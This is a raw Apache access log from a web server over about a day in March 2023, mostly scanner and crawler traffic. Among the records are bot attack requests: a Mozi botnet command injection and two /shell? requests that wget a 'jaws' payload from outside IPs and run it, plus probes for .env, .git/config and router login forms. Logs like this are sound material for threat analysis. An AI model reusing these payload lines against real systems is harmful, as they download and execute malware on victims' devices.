94.102.51.9 - - [27/Mar/2023:13:31:17 +0000] "GET / HTTP/1.1" 200 8369 "-" "Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20"
188.27.26.165 - - [27/Mar/2023:13:38:34 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
135.125.246.110 - - [27/Mar/2023:14:04:19 +0000] "POST / HTTP/1.1" 405 409760 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [27/Mar/2023:14:08:46 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.154.128.189 - - [27/Mar/2023:14:35:55 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
66.240.236.109 - - [27/Mar/2023:14:47:15 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 zgrab/0.x"
2.187.6.139 - - [27/Mar/2023:15:21:57 +0000] "-" 408 - "-" "-"
179.43.177.242 - - [27/Mar/2023:15:26:51 +0000] "GET / HTTP/1.1" 200 41226 "-" "Hello World"
35.216.169.119 - - [27/Mar/2023:15:27:04 +0000] "\x16\x03\x01" 400 226 "-" "-"
35.216.169.119 - - [27/Mar/2023:15:27:04 +0000] "GET / HTTP/1.1" 400 226 "-" "-"
35.216.169.119 - - [27/Mar/2023:15:27:05 +0000] "GET / HTTP/1.1" 200 41226 "-" "l9tcpid/v1.1.0"
35.216.169.119 - - [27/Mar/2023:15:27:05 +0000] "GET /config.json HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.169.119 - - [27/Mar/2023:15:27:06 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.169.119 - - [27/Mar/2023:15:27:06 +0000] "GET /telescope/requests HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.169.119 - - [27/Mar/2023:15:27:07 +0000] "GET /info.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.169.119 - - [27/Mar/2023:15:27:07 +0000] "GET /.git/config HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.169.119 - - [27/Mar/2023:15:27:07 +0000] "GET /server-status HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
172.104.11.51 - - [27/Mar/2023:15:27:24 +0000] "\x16\x03\x01" 400 226 "-" "-"
135.125.246.110 - - [27/Mar/2023:15:45:57 +0000] "POST / HTTP/1.1" 405 409748 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
47.254.255.160 - - [27/Mar/2023:15:47:30 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
47.254.255.160 - - [27/Mar/2023:15:47:31 +0000] "POST / HTTP/1.1" 405 409722 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [27/Mar/2023:15:55:13 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
34.22.147.120 - - [27/Mar/2023:15:56:46 +0000] "GET / HTTP/1.1" 200 8383 "-" "python-requests/2.28.2"
45.81.243.34 - - [27/Mar/2023:16:05:20 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
45.81.243.34 - - [27/Mar/2023:16:05:20 +0000] "POST /HNAP1/ HTTP/1.1" 301 235 "-" "Mozila/5.0"
193.93.217.223 - - [27/Mar/2023:16:06:56 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
198.199.118.125 - - [27/Mar/2023:16:49:07 +0000] "MGLNDD_13.244.159.169_80\n" 400 226 "-" "-"
192.155.90.118 - - [27/Mar/2023:16:58:12 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [27/Mar/2023:17:13:54 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
179.43.177.242 - - [27/Mar/2023:17:16:58 +0000] "GET / HTTP/1.1" 200 41226 "-" "Hello World"
64.226.102.66 - - [27/Mar/2023:17:36:18 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) Project-Resonance (http://project-resonance.com/) (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
193.32.162.159 - - [27/Mar/2023:17:38:32 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.180.143.71 - - [27/Mar/2023:17:47:55 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
135.125.246.110 - - [27/Mar/2023:18:06:23 +0000] "POST / HTTP/1.1" 405 409724 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
64.226.106.59 - - [27/Mar/2023:18:06:27 +0000] "\x16\x03\x01" 400 226 "-" "-"
64.226.106.59 - - [27/Mar/2023:18:06:28 +0000] "\x16\x03\x01" 400 226 "-" "-"
64.226.106.59 - - [27/Mar/2023:18:06:28 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.226.106.59 - - [27/Mar/2023:18:06:28 +0000] "GET /client/get_targets HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.226.106.59 - - [27/Mar/2023:18:06:29 +0000] "GET /upl.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
64.226.106.59 - - [27/Mar/2023:18:06:30 +0000] "GET /geoip/ HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.226.106.59 - - [27/Mar/2023:18:06:30 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
45.81.243.34 - - [27/Mar/2023:18:23:40 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
45.81.243.34 - - [27/Mar/2023:18:23:40 +0000] "POST /HNAP1/ HTTP/1.1" 301 235 "-" "Mozila/5.0"
43.154.128.189 - - [27/Mar/2023:18:32:18 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
45.79.181.179 - - [27/Mar/2023:18:50:13 +0000] "\x16\x03\x01" 400 226 "-" "-"
124.234.181.179 - - [27/Mar/2023:18:57:38 +0000] "GET / HTTP/1.1" 200 41226 "-" "Hello World"
103.119.165.253 - - [27/Mar/2023:19:06:16 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
105.214.71.108 - - [27/Mar/2023:19:25:29 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
135.125.246.110 - - [27/Mar/2023:19:37:27 +0000] "POST / HTTP/1.1" 405 409762 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [27/Mar/2023:19:37:45 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.154.128.189 - - [27/Mar/2023:19:50:37 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.180.143.138 - - [27/Mar/2023:19:50:59 +0000] "\x16\x03\x01" 400 226 "-" "-"
190.211.252.122 - - [27/Mar/2023:20:21:21 +0000] "CONNECT pro.ip-api.com:443 HTTP/1.1" 405 405320 "-" "-"
185.254.196.173 - - [27/Mar/2023:20:27:01 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [27/Mar/2023:20:27:02 +0000] "POST / HTTP/1.1" 405 409722 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
104.152.52.232 - - [27/Mar/2023:20:48:03 +0000] "GET / HTTP/1.0" 200 41463 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
45.79.181.94 - - [27/Mar/2023:20:54:43 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [27/Mar/2023:21:08:57 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.246.110 - - [27/Mar/2023:21:23:13 +0000] "POST / HTTP/1.1" 405 409730 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [27/Mar/2023:21:39:50 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.79.181.223 - - [27/Mar/2023:21:45:46 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
123.10.238.144 - - [27/Mar/2023:21:49:06 +0000] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 226 "-" "-"
43.154.128.189 - - [27/Mar/2023:22:27:09 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.246.110 - - [27/Mar/2023:22:31:57 +0000] "POST / HTTP/1.1" 405 409702 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.15.155 - - [27/Mar/2023:22:37:04 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
192.155.90.220 - - [27/Mar/2023:22:51:38 +0000] "\x16\x03\x01" 400 226 "-" "-"
117.202.214.183 - - [27/Mar/2023:23:30:17 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
193.32.162.159 - - [27/Mar/2023:23:31:16 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
85.217.145.45 - - [27/Mar/2023:23:37:39 +0000] "GET / HTTP/1.1" 200 41226 "-" "Go-http-client/1.1"
43.154.128.189 - - [27/Mar/2023:23:45:20 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
198.235.24.141 - - [28/Mar/2023:00:07:29 +0000] "\x16\x03\x01" 400 226 "-" "-"
198.235.24.5 - - [28/Mar/2023:00:10:40 +0000] "GET / HTTP/1.0" 200 41463 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
135.125.246.110 - - [28/Mar/2023:00:28:35 +0000] "POST / HTTP/1.1" 405 409714 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
117.210.151.190 - - [28/Mar/2023:00:31:27 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
45.79.172.21 - - [28/Mar/2023:00:51:02 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [28/Mar/2023:01:03:36 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
103.203.57.1 - - [28/Mar/2023:01:12:34 +0000] "GET / HTTP/1.1" 200 41226 "-" "HTTP Banner Detection (https://security.ipip.net)"
137.184.19.175 - - [28/Mar/2023:01:22:15 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 zgrab/0.x"
135.125.246.110 - - [28/Mar/2023:01:51:07 +0000] "POST / HTTP/1.1" 405 409738 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [28/Mar/2023:02:11:40 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.154.128.189 - - [28/Mar/2023:02:21:41 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
198.235.24.162 - - [28/Mar/2023:02:27:04 +0000] "GET / HTTP/1.0" 200 41463 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
51.254.59.113 - - [28/Mar/2023:02:40:05 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
179.43.177.242 - - [28/Mar/2023:02:46:11 +0000] "GET / HTTP/1.1" 200 41226 "-" "Hello World"
103.184.96.146 - - [28/Mar/2023:02:48:32 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 103.57.130.161/jaws;sh+/tmp/jaws" 400 226 "-" "-"
45.79.181.104 - - [28/Mar/2023:02:50:46 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.153.208.98 - - [28/Mar/2023:03:06:57 +0000] "GET / HTTP/1.1" 200 8384 "-" "'Mozilla/5.0"
193.32.162.159 - - [28/Mar/2023:03:17:36 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
77.49.172.124 - - [28/Mar/2023:03:23:32 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
43.154.128.189 - - [28/Mar/2023:03:39:45 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.246.110 - - [28/Mar/2023:04:09:34 +0000] "POST / HTTP/1.1" 405 409746 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
192.155.90.118 - - [28/Mar/2023:04:53:36 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [28/Mar/2023:04:58:03 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.209.160.120 - - [28/Mar/2023:05:18:18 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 405 423585 "http://13.244.159.169:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
135.125.246.110 - - [28/Mar/2023:05:26:13 +0000] "POST / HTTP/1.1" 405 409734 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [28/Mar/2023:06:16:30 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.32.162.159 - - [28/Mar/2023:06:30:56 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
65.78.171.71 - - [28/Mar/2023:06:39:27 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
135.125.246.110 - - [28/Mar/2023:06:40:30 +0000] "POST / HTTP/1.1" 405 409694 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [28/Mar/2023:06:53:56 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [28/Mar/2023:06:53:57 +0000] "POST / HTTP/1.1" 405 409724 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
198.235.24.19 - - [28/Mar/2023:07:13:27 +0000] "GET / HTTP/1.1" 200 41226 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
216.218.206.69 - - [28/Mar/2023:07:19:02 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0"
216.218.206.69 - - [28/Mar/2023:07:21:17 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0"
216.218.206.69 - - [28/Mar/2023:07:21:53 +0000] "GET /geoserver/web/ HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0"
193.32.162.159 - - [28/Mar/2023:07:22:15 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
159.65.111.248 - - [28/Mar/2023:07:26:12 +0000] "GET / HTTP/1.0" 200 41226 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0"
43.154.128.189 - - [28/Mar/2023:07:35:17 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
198.199.108.164 - - [28/Mar/2023:08:04:48 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 zgrab/0.x"
59.126.89.173 - - [28/Mar/2023:08:08:22 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
135.125.246.110 - - [28/Mar/2023:08:41:34 +0000] "POST / HTTP/1.1" 405 409718 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [28/Mar/2023:08:53:54 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
45.79.181.223 - - [28/Mar/2023:09:01:58 +0000] "\x16\x03\x01" 400 226 "-" "-"
179.43.177.242 - - [28/Mar/2023:09:19:50 +0000] "GET / HTTP/1.1" 200 41226 "-" "Hello World"
::1 - - [28/Mar/2023:09:41:37 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:38 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:39 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:40 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:41 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:42 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:43 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:44 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:45 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:46 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:47 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:48 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:49 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:50 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:51 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:52 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:53 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:54 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:55 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:56 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:57 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:58 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:41:59 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:42:00 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:42:01 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:42:02 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:42:03 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:42:04 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:42:05 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:09:42:06 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
